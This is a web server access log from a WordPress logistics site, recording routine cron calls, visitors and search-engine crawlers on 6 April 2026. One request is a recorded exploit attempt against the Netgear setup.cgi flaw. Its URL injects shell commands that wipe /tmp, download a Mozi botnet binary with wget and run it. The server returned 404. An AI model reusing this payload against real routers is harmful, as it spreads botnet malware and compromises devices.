36.133.115.36 - - [06/Apr/2026:11:44:07 +0800] "POST /wp-cron.php?doing_wp_cron=1775447047.2353420257568359375000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
162.62.231.139 - - [06/Apr/2026:11:44:07 +0800] "GET / HTTP/1.1" 200 34824 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [06/Apr/2026:11:45:49 +0800] "POST /wp-cron.php?doing_wp_cron=1775447148.9888749122619628906250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
47.114.89.255 - - [06/Apr/2026:11:45:49 +0800] "GET /upVideo HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [06/Apr/2026:12:34:01 +0800] "POST /wp-cron.php?doing_wp_cron=1775450041.8799629211425781250000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
120.241.209.145 - - [06/Apr/2026:12:34:01 +0800] "GET /2159/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
219.136.244.21 - - [06/Apr/2026:12:34:03 +0800] "GET /news/2159 HTTP/1.1" 200 28757 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
51.195.244.228 - - [06/Apr/2026:13:16:57 +0800] "GET /news/2420 HTTP/1.1" 200 19851 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [06/Apr/2026:13:35:15 +0800] "POST /wp-cron.php?doing_wp_cron=1775453715.0988268852233886718750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
176.65.149.227 - - [06/Apr/2026:13:35:15 +0800] "GET / HTTP/1.1" 200 157016 "-" "-"
36.133.115.36 - - [06/Apr/2026:13:38:09 +0800] "POST /wp-cron.php?doing_wp_cron=1775453889.8824479579925537109375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
103.176.16.97 - - [06/Apr/2026:13:38:09 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 31352 "-" "-"
36.133.115.36 - - [06/Apr/2026:13:43:41 +0800] "POST /wp-cron.php?doing_wp_cron=1775454221.1489179134368896484375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
114.119.128.58 - - [06/Apr/2026:13:43:41 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [06/Apr/2026:13:44:19 +0800] "POST /wp-cron.php?doing_wp_cron=1775454259.4109539985656738281250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
110.249.201.184 - - [06/Apr/2026:13:44:19 +0800] "GET /logistics HTTP/1.1" 200 25345 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
110.249.201.184 - - [06/Apr/2026:13:44:20 +0800] "GET /wp-content/uploads/2025/11/1762864381-QZ_Photo-7-768x512.webp HTTP/1.1" 206 500 "http://cqqizhou.com/logistics" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
110.249.201.233 - - [06/Apr/2026:13:44:20 +0800] "GET /wp-content/uploads/2026/01/1767696162-qizhoutruck3-768x173.webp HTTP/1.1" 206 500 "http://cqqizhou.com/logistics" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
110.249.201.47 - - [06/Apr/2026:13:44:20 +0800] "GET /wp-content/uploads/2025/12/1765862012-DSC20251216131140-768x432.webp HTTP/1.1" 206 500 "http://cqqizhou.com/logistics" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
